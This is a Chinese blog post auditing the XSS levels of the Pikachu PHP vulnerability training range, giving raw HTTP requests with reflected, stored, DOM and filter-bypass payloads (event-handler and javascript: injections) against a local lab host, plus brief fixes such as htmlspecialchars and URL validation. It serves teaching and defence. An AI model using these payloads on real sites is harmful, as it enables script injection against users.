1、皮卡丘代码审计(1)

最新推荐文章于 2024-07-16 10:12:41 发布
最新推荐文章于 2024-07-16 10:12:41 发布
阅读量348 收藏 9
点赞数 8
分类专栏: php代码审计(一) 文章标签: php 代码审计
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YINZHE_/article/details/136412074
版权

XSS

1、反射性xss(一)

限制

submit参数不能为空
前台/后台:前台

复现

在这里插入图片描述

GET /vul/xss/xss_reflected_get.php?message=qws<h1>ssss</h1>ggg&submit=submit HTTP/1.1
Host: bbb.com:8882
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bbb.com:8882/vul/xss/xss_reflected_get.php?message=23es&submit=submit
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=ne8pqc7qv0fcvrnbj1vspd981c
Connection: close

代码

在这里插入图片描述

修复

使用htmlspecialchars函数进行html实体化编码

在这里插入图片描述
在这里插入图片描述

2、反射性xss(二)

限制

submit参数不能为空
前台/后台:后台

复现

POST /vul/xss/xsspost/xss_reflected_post.php HTTP/1.1
Host: bbb.com:8882
Content-Length: 38
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://bbb.com:8882
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bbb.com:8882/vul/xss/xsspost/xss_reflected_post.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ant[uname]=admin; ant[pw]=10470c3b4b1fed12c3baac014be15fac67c6e815; PHPSESSID=ne8pqc7qv0fcvrnbj1vspd981c
Connection: close

message=111<h1>aaa</h1>s&submit=submit

在这里插入图片描述

代码

在这里插入图片描述

修复

在这里插入图片描述
在这里插入图片描述

3、存储性xss

限制

message参数不能为空

复现

POST /vul/xss/xss_stored.php HTTP/1.1
Host: bbb.com:8882
Content-Length: 37
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://bbb.com:8882
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bbb.com:8882/vul/xss/xss_stored.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=ne8pqc7qv0fcvrnbj1vspd981c
Connection: close

message=aa<h1>sss</h1>3&submit=submit

在这里插入图片描述

代码

在这里插入图片描述

修复

在这里插入图片描述
在这里插入图片描述

4、dom型xss(一)

限制

复现

<script>

                    function domxss(){
                        var str = document.getElementById("text").value;
                        document.getElementById("dom").innerHTML = "<a href='"+str+"'>what do you see?</a>";
                    }
                    //试试:'><img src="#" onmouseover="alert('xss')">
                    //试试:' onclick="alert('xss')">,闭合掉就行
</script>

在这里插入图片描述

代码

在这里插入图片描述

修复

在这里插入图片描述
在这里插入图片描述

5、dom型xss(二)

限制

复现

<script>
                    function domxss(){
                        var str = window.location.search;
                        var txss = decodeURIComponent(str.split("text=")[1]);
                        var xss = txss.replace(/\+/g,' ');
//                        alert(xss);

                        document.getElementById("dom").innerHTML = "<a href='"+xss+"'>就让往事都随风,都随风吧</a>";
                    }
                    //试试:'><img src="#" onmouseover="alert('xss')">
                    //试试:' onclick="alert('xss')">,闭合掉就行
</script>

在这里插入图片描述

代码

在这里插入图片描述

修复

在这里插入图片描述

6、xss盲打

限制

前台/后台:前台、后台

复现

POST /vul/xss/xssblind/xss_blind.php HTTP/1.1
Host: bbb.com:8882
Content-Length: 84
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://bbb.com:8882
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bbb.com:8882/vul/xss/xssblind/xss_blind.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ant[uname]=admin; ant[pw]=10470c3b4b1fed12c3baac014be15fac67c6e815; PHPSESSID=ne8pqc7qv0fcvrnbj1vspd981c
Connection: close

content=%3Ch1%3Eaaa%3C%2Fh1%3E&name=%3Ch1%3Eccc%3C%2Fh1%3E&submit=%E6%8F%90%E4%BA%A4

在这里插入图片描述

GET /vul/xss/xssblind/admin.php HTTP/1.1
Host: bbb.com:8882
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ant[uname]=admin; ant[pw]=10470c3b4b1fed12c3baac014be15fac67c6e815; PHPSESSID=ne8pqc7qv0fcvrnbj1vspd981c
Connection: close

在这里插入图片描述

代码

在这里插入图片描述
在这里插入图片描述

修复

在这里插入图片描述
在这里插入图片描述

7、xss之过滤

限制

message参数不能为空
对<script过滤

复现

GET /vul/xss/xss_01.php?message=111%3Ch1%3Eaaa%3C%2Fh1%3Es&submit=submit HTTP/1.1
Host: bbb.com:8882
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bbb.com:8882/vul/xss/xss_01.php?message=%27sss&submit=submit
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=ne8pqc7qv0fcvrnbj1vspd981c
Connection: close

在这里插入图片描述

代码

在这里插入图片描述

修复

在这里插入图片描述
在这里插入图片描述

8、xss之htmlspecialchars

xss之htmlspecialchars方法:
1) ' onclick='alert(111)'  
2) ' onmouseover='alert(1)
3) ' onmouseover='javascript:alert(1)'

限制

htmlspecialchars函数过滤
message不能为空

复现

GET /vul/xss/xss_02.php?message=%27+onclick%3D%27alert%28111%29%27&submit=submit HTTP/1.1
Host: bbb.com:8882
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bbb.com:8882/vul/xss/xss_02.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=ne8pqc7qv0fcvrnbj1vspd981c
Connection: close

在这里插入图片描述

代码

在这里插入图片描述

修复

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

9、xss之href

限制

htmlspecialchars函数过滤
$message=htmlspecialchars($_GET['message'],ENT_QUOTES)
message不能为空

复现

GET /vul/xss/xss_03.php?message=javascript%3Aalert%281%29&submit=submit HTTP/1.1
Host: bbb.com:8882
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bbb.com:8882/vul/xss/xss_03.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=ne8pqc7qv0fcvrnbj1vspd981c
Connection: close

在这里插入图片描述

代码

这里虽然有过滤,但是传入的payload,并不会被函数处理(不含有<>'")

在这里插入图片描述

修复

在这里插入图片描述

(filter_var($message,FILTER_VALIDATE_URL)) 来判断传入的参数是否是一个有效的url

在这里插入图片描述

10、xss之js

补充
此题目作者的含义:
在这里插入图片描述
复现时,需要将代码的内的注释去掉:
在这里插入图片描述

限制

message不能为空

复现

GET /vul/xss/xss_04.php?message=%27%3Balert%281%29%3B%2F%2F&submit=submit HTTP/1.1
Host: bbb.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bbb.com/vul/xss/xss_04.php?message=%27%3Balert%281%29%3B%2F%2F&submit=submit
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=fpm02f02d29h0gn46rpu4jrj59
Connection: close

在这里插入图片描述

代码

接收参数

在这里插入图片描述

将接收的参数输出

在这里插入图片描述

修复

这里假设使用htmlspecialchars函数进行处理

在这里插入图片描述

	输入的“ ' ”被转义为html实体化编码,影响最初的功能设计

在这里插入图片描述

所以这里使用“ \ ”过滤,

在这里插入图片描述

再次传入恶意参数,
传入的字符串被“原样输出”,且没有被浏览器解析。

在这里插入图片描述

YINZHE_
关注
  • 8
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Python皮卡丘代码.rar
04-26
1. **基础语法**:皮卡丘.py文件中可能会包含Python的基本语句,如变量声明、条件判断(if-else)、循环(for和while)、函数定义(def)等。这些基础知识是所有Python程序的基础。 2. **面向对象编程**:Python...
随便弄的画皮卡丘代码
12-24
python
生命在于折腾——皮卡丘靶场源码审计(一)
易水哲的博客
09-19 1478
皮卡丘靶场源码审计(一)
3、皮卡丘代码审计(3)
Yzz_的博客
03-02 1001
参考:https://blog.csdn.net/weixin_45663905/article/details/108026223。
2、皮卡丘代码审计(2)
Yzz_的博客
03-02 309
代码】2、皮卡丘代码审计(2)
生命在于折腾——皮卡丘靶场源码审计(二)
易水哲的博客
09-19 740
皮卡丘靶场源码审计(二)
皮卡丘web靶场的搭建介绍
03-15 8184
NCNIPC–皮卡丘web靶场的搭建介绍 书籍中使用皮卡丘web靶场做web漏洞分析,开源源代码链接如下 https://github.com/zhuifengshaonianhanlu/pikachu 一、下载源代码 从互联网上下载源代码到本地,准备下一步搭建 二、搭建靶场 我这里为了方便部署在window 10系统上,使用一种较为快捷的部署方式,使用小皮面板进行快速搭建。 小皮面板安装网址大家可以去百度一下,傻瓜式安装非常方便,也是大家以后进行代码审计要用到的快捷部署工具。 开启小皮的WAMP环境(
pikachu PHP反序列化(皮卡丘漏洞平台通关系列)
箭雨镜屋
01-30 3742
诶嘿,又是一个简单的关卡 1、学习,学习一下 先跟着pikachu简单学习一下什么叫序列化和反序列化: 但其实我已知这里有两个地方写的不对,需要更正一下: (1)序列化结果中的S不是对象名称,而是类名称;同样的,O和S中间的1应该是类名字长度。 (2)几个魔法函数的举例有点让人误会,很容易误以为这些魔法函数都会造成反序列化漏洞,但其实__construct()在unserialize()时并不会被自动调用,这点在之后会进行演示。 总之,序列化是把对象转换为字符串,从而达到传输和存储的目的
pikachu之php反序列化
qq_43665434的博客
02-18 401
pikachu之php反序列化 一、php对象和类 php面向对象编程: 对象:可以做一些事情。一个对象有状态、行为和标识三种属性。 类:一个共享共同结构和行为的对象的集合。 每个类的定义都以class开头,后面跟着类的名字,一个类可以包含有属于自己的变量,变量(称为属性)以及函数(称为方法)。类定义了一件事物的抽象特点。通常来说,类定义了事物的属性和它可以做到的。 类可能包含一些特殊的函数(magic函数),magic函数命名是以符号‘_’开头的,比如_construct当一个队形创建时调用;_dest
2023年上半年信息系统项目管理师——综合知识真题与答案解释(1)
逆境清醒的博客
04-10 1482
2023年上半年信息系统项目管理师综合知识真题与答案解释(1)“新型基础设施”主要包括信息技术设施、融合基础设施和创新基础设施三个方面。其中信息基础设施包括()
python皮卡丘代码直接用
10-12
"python皮卡丘代码直接用"这个标题暗示了我们将讨论如何使用Python来绘制或者操作与皮卡丘相关的图像。皮卡丘是著名的口袋妖怪角色,因此这个项目可能是为了展示动画、游戏开发或图像编辑技术。 描述中提到"我用...
皮卡丘3d打印 stl模型1
05-12
皮卡丘3d打印 stl模型1
皮卡丘
02-09
"皮卡丘"在这里可能指的是一个使用JavaScript技术开发的项目或者应用。JavaScript是一种广泛用于Web开发的编程语言,尤其在构建交互式用户界面、前端应用以及服务器端(Node.js)编程中发挥着重要作用。皮卡丘项目可能...
java版的上门家政系统和PHP版的上门家政有什么区别?
baina666的博客
07-12 586
综上所述,Java版和PHP版的上门家政系统各有优缺点,选择哪种语言主要取决于项目的具体需求、预算、开发团队的技术栈以及未来的扩展计划等因素。同时,由于Java生态系统的复杂性和多样性,也可能需要投入更多的时间和资源来学习和掌握相关的技术和工具。Java版:Java拥有庞大的生态系统和丰富的第三方库,这为家政系统的开发和扩展提供了强大的支持。Java版:由于Java的编译执行机制和高效的垃圾回收算法,Java版家政系统通常具有更高的运行效率和更好的性能表现,尤其是在处理高并发、大数据量等复杂场景时。
小欧吃苹果-OPPO 2024届校招正式批笔试题-数据开发(C卷)
最新发布
sigd的博客
07-16 224
小欧吃苹果,拓扑排序处理贪心问题。
ns3-gym入门(二):linear-mesh例子详解
zoe2222226666的博客
07-15 738
学习ns3-gym中关于IEEE 802.11网状网络中控制随机接入的例子linear-mesh
三级_网络技术_14_局域网技术基础及应用
2301_80961833的博客
07-12 417
连接到集线器的结点发送数据时,将执行CSMA/CD介质访问控制方法。连接到集线器的结点发送数据时,将执行CSMA/CA介质访问控制方法。连接到集线器的结点发送数据时,将执行CSMA/CD介质访问控制方法。连接到集线器的结点发送数据时,将执行CSMACD介质访问控制方法。连接到集线器的结点发送数据时,将执行CSMACD介质访问控制方法。连接到集线器的结点发送数据时,将执行CSMACD介质访问控制方法。连接到集线器的结点发送数据时,将执行CSMACD介质访问控制方法。
掌握Laravel框林之美:全面解析PHP的优雅实践
weixin_42132035的博客
07-12 550
Laravel是一个为开发者提供高效、优雅的编程工作流的PHP框架。自从2011年Taylor Otwell发布首个版本以来,Laravel迅速成为了PHP社区中最受欢迎的框架之一。其流行的根本原因在于,它提供了一种美观的编码方式,同时简化了开发过程中常见任务的处理,例如路由、会话、缓存和身份验证。Laravel以其全面的功能、优雅的代码设计,在PHP开发者中保持着高度的人气。无论是新手还是有经验的开发者,Laravel都是构建Web应用的强大工具。
Python皮卡丘代码
02-19
Python皮卡丘代码是指使用Python语言编写的一个程序,可以在控制台或者图形界面上显示出皮卡丘的图像。这个程序通常使用Python的图形库来实现,比如Tkinter或者Pygame。 以下是一个简单的Python皮卡丘代码示例: ```python import turtle # 设置画布和画笔 screen = turtle.Screen() screen.bgcolor("yellow") pen = turtle.Turtle() # 绘制皮卡丘的头部 pen.penup() pen.goto(-50, 0) pen.pendown() pen.begin_fill() pen.color("black") pen.circle(100) pen.end_fill() # 绘制皮卡丘的眼睛 pen.penup() pen.goto(-30, 60) pen.pendown() pen.begin_fill() pen.color("white") pen.circle(20) pen.end_fill() pen.penup() pen.goto(-70, 60) pen.pendown() pen.begin_fill() pen.color("white") pen.circle(20) pen.end_fill() # 绘制皮卡丘的眼珠 pen.penup() pen.goto(-40, 80) pen.pendown() pen.begin_fill() pen.color("black") pen.circle(10) pen.end_fill() pen.penup() pen.goto(-80, 80) pen.pendown() pen.begin_fill() pen.color("black") pen.circle(10) pen.end_fill() # 绘制皮卡丘的嘴巴 pen.penup() pen.goto(-60, 20) pen.pendown() pen.width(5) pen.color("black") pen.goto(-40, 0) pen.goto(-20, 20) # 绘制皮卡丘的脸颊 pen.penup() pen.goto(-70, -20) pen.pendown() pen.begin_fill() pen.color("red") pen.circle(15) pen.end_fill() pen.penup() pen.goto(-30, -20) pen.pendown() pen.begin_fill() pen.color("red") pen.circle(15) pen.end_fill() # 隐藏画笔 pen.hideturtle() # 关闭画布 turtle.done() ``` 这段代码使用了turtle库来绘制皮卡丘的图像。通过设置画布和画笔,然后使用一系列的绘图命令来绘制出皮卡丘的头部、眼睛、嘴巴和脸颊等特征。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值